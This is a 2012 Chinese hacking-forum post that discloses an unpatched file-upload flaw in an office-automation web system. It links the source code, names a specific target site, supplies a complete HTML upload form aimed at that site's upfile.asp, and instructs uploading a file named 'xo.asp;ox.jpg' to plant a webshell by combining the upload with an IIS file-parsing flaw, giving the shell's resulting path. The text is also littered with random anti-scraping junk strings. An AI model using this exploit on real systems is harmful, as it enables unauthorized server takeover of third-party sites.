找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2149|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
/ z6 t* W8 g8 @3 R& Z" W
# l. W& s5 }4 u& R; p" V9 f/ D系统介绍:3 c* N' K8 [+ N
! y; V7 [9 ?9 S
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
! L. _1 a# q2 L* A8 R+ R+ M" Q5 [3 d9 ~; v- s( @! _$ m5 |
主要功能:
) z! `. |* U  u% o7 P公司通告 % j9 ]5 w' H4 p! i. r; G: g: ?& M
工作计划
  V& Y9 R4 J. o. Q  a4 }& S通讯助理 % m- B( C# s' y2 j( \
客户资源 + u3 b" G/ z" A- y4 z
我的公文
- m- M- M! c1 T7 z* A5 Z公文传阅 # ]1 |* x" E* _; ~$ L
公共资源
3 R" N, A; u) x1 H$ Q' I资源预约 / g. X' S( U$ w  _) M4 Z
今日考勤
; p* t) @' i( p* J5 X9 {% U7 r个人计划
" e* `4 M8 m, j( P# R+ E9 d, d  {个人通讯录
; s( r1 [# r* b0 @7 G个人基本档案
! m1 k! z) P- g% f* P: f未读邮件 : @+ C+ L; O; D: n7 s( z1 C  `9 J
发邮件
* Q# j0 C5 f, d( e6 c, G收件夹 ! o( ^7 [! o+ L$ O. |
寄件夹
$ V' O: {# G8 U# Y9 r网络硬盘
8 C6 X4 i7 Z( D网络会议
9 N% c2 G1 o; L网络调查
$ [( V. k% @' g$ R9 [+ ?8 i交流论坛
7 x% Y& d- o0 {1 a; l- m+ ]/ Y' X8 s. Y, a9 Z
有兴趣测试的朋友可以下源码看看
- g& E  [0 v" Y7 F# X3 ]
- V( g! u. N1 E4 Y9 [3 a6 R源码下载:/ C/ x% w) u; |- h& c
! x3 E( A3 {: U2 g/ {
http://www.mycodes.net/30/4750.htm; K/ o8 _8 R. o/ Z
1 |3 Y' g8 _$ f3 Y; x  L& e; T
漏洞介绍:% N7 Y  i& p# ]1 ]% w- y* N, s
" C# p: N, o/ w3 _( y4 e* Z
由upfile.asp上传文件漏洞引起
- N' y, h  g6 D) z* L/ E1 M
# a/ [) A* \: I6 L测试方法:
1 c2 J; r% b8 |/ z. D# y% r1 R  L1 ^: [6 i8 J* E3 E* l+ q
使用名小子上传http://www.itlynn.com/upfile.asp即可
1 R0 L7 A9 T5 S6 t6 u$ S; f9 \* x
如果upfile.asp文件被删除不存在。6 d# O6 o6 t& B7 p. P& F" W
  o8 {2 u  Y* z% a% n7 U/ `/ a
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
" G, o* K2 |8 o! @6 o8 ^2 N9 W7 l4 O/ \! V
如果存在那么将如下代码保存为upfile.html。' q: K: F+ q0 ^7 S! x
& L4 L' n' D( w: ~0 \+ G
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
5 F+ d! b1 }4 w; ?1 {: w( H
9 c& I- s7 t# w$ J& ?5 m, O
5 I' \( d3 D. E7 z/ K! o
5 e5 j3 _+ O" ]1 Z01 <table border='0' align="center" cellpadding="5"> " d& ^( s) J6 f# |/ f6 q
+ o5 S0 Z' H  D. K0 r! U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. m# A/ i1 t' m+ N( h, P, a/ k9 D1 A
03 <tr>
5 S; M$ U5 o8 W* w, u+ c3 c. o! l5 J- e' W  c; q8 X+ m" g
04             <td>报错:</td> ' B- [' K8 p5 i9 o7 _
" v- B- w; Z! R# N' m
05             <td><input type='radio' name='errnumber' value='0'>
/ C/ K* J" ~7 s) M9 [. `& j$ a% K# p
06               自动更名
4 b- i! E2 M0 |. @' }& J: N
! v& {7 `8 i, i! g07               <input type='radio' name='errnumber' value='1' checked> 1 ?* `6 Z% A' E2 l) ^! W0 I
$ E2 `. m% c) o  _# N
08               报错方式 ) K' y. }  N  ]

# K3 S( ]! q) L) v) d; m) ~09               <input type='radio' name='errnumber' value='2'>
3 d3 G+ _2 [0 d/ J5 {' V' Z/ H/ a! V$ A7 J5 @( w
10               直接覆盖</td> & g8 }* b7 |+ |3 |0 w/ y
5 |$ j, m8 C4 N- _; q6 i1 ?
11           </tr> * D6 V( w3 w8 @% z* G( U
3 N+ A3 ?: ^& `+ `
12           <tr>
' R8 k, u5 ?9 p( s! J. D0 p* M& Z& V1 W
13             <td>主题:</td> ) [% B4 J1 A+ Y$ x0 N9 k
) S8 c/ |& P" V$ Y% ^9 X
14             <td><input type='text' name='filename' size='30'></td>
* l+ J- k, e" ^' k' ]- H' E
+ n) P0 f- z' M& y6 C4 R  _15           </tr> % d7 g2 G6 E: C3 O# `* Q  m6 s9 `
  j0 n$ b  W1 `: l
16           <tr>
- y6 x6 S) m+ D  b3 m( }9 Z
8 a6 z" e( m5 M5 f17             <td>文件:</td>   j. W5 [1 x+ Q# Q

8 h/ e) t. ~5 x6 z& P18             <td><input type="file"name="fruit"size="30"></td> " x( T  H4 l1 R" g5 p
" b5 L+ ~" l% a& n- w9 e8 _
19           </tr> ) m6 |; S; n( K3 K+ ~. f' p" C

( @1 A9 e$ o  U- X9 _& `: z9 b, s20           <tr> / O4 D+ j* v' f

1 ]" y8 [6 ?5 U" n21             <td valign='top'>简介:</td>
  ]- M! O6 j! ~$ z" ]% ?; e: R7 ~+ C1 `- v( D; ^# C4 `
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
  a& r/ o0 c% e0 r5 w
( u+ o4 `0 H4 W/ ?0 j23           </tr>
; |* S& v5 N- D! A- k, i5 N& {' K+ S; c1 V, L! I
24   - d+ [* v' m: z
0 G2 y9 w, z2 c7 P4 {* [/ {
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> , ~$ r$ C5 I% Y( D- i, }' L) D

; L7 U6 v! m; M% c) i3 h" g26           </tr> , p% F" Z' j5 Z6 n

9 p$ _7 G3 y- l+ ^. g" N* K/ ]! ]27         </form> 4 J0 a7 J1 S. t8 i6 E  c! z# ?
6 C0 F* y6 o$ O# L- R
然后打开上传一个文件名为xo.asp;ox.jpg的文件。6 w2 K# a+ N' I* Y* r/ B
# g3 ?0 ]1 p! S7 C; w; z" B
! `, n+ \/ m/ ?3 Q9 |' ]9 ]& j# X
9 L7 b' |# o& t4 d# D
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg1 Y- i+ W5 f# E  i

% N( u5 E  G2 g/ V5 J此漏洞需要配合解析漏洞利用。
4 H9 S0 D# g3 N+ i: E7 Y
' U' {7 @( P! U: e3 c5 p: s/ |8 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表